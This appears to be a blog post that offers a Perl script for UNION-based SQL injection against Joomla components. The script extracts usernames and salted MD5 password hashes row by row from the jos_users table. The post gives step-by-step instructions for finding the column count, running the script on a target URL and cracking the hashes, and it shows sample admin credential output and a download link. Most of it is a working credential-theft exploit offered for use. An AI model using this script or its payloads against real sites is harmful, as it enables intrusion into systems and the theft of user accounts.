Simple Script SQL Injection joomla

This is a simple joomla SQL Injection can create md5 passwords and form md5salt and we can determine how many rows from the table jos_user ...

!/usr/bin/perl -w
print "\t\t###############################################\n\n";
print "\t\t# Joomla SQL Injection #\n\n";
print "\t\t###############################################\n\n";
use LWP::UserAgent;
die "Contoh: perl $0 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' 'baris_dari_pass'\n" unless @ARGV;
$user="username";
$pass="password";
$tabel="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] .
"+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),
".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),
".$pass.",CHAR(60,112,97,115,115,62)),3,4,5+from+".$tabel."
+LIMIT+".$ARGV[1].",1--";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /(.*?)/){
print "\n[+] Username : $1";
}
if ($answer =~/(.*?)/){
print "\n[+] password : $1\n\n";
print "\t\t# berhasil #\n\n";}
else{print "\n[-] gagal...\n";}

needs to be done is to determine the number of existing colom and how the numbers appear
example :
1. target is http://joomla_web.com/path/index.php?option=com_contoh&id=1
2. many colomns are 5 ===>+AND+1=2+UNION+SELECT+1,2,3,4,5--
3. number appears is 2 ===>+AND+1=2+UNION+SELECT+1,concat(CHAR(60,117,115,101,114,62),
".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),
".$pass.",CHAR(60,112,97,115,115,62)),3,4,5--

then you can use it
perl joomla.pl 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' '0'
notes :
joomla.pl ==>name of file
'http://joomla_web.com/path/index.php?option=com_contoh&id=1' ==>joomla have vulnerability
'0' ==>first row from tabel jos_user, for second replace with '1', and so on

if successful it will be like this

###################################################

# Joomla SQL Injection #


###################################################


[+] Username : admin
[+] password : faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

# berhasil #

now living to crack md salt

or you can download that script here
http://www.ziddu.com/download/8111490/joomla.zip.html

You can leave a response, or trackback from your own site.

0 Response to "Simple Script SQL Injection joomla"

Post a Comment

Powered by NGELIH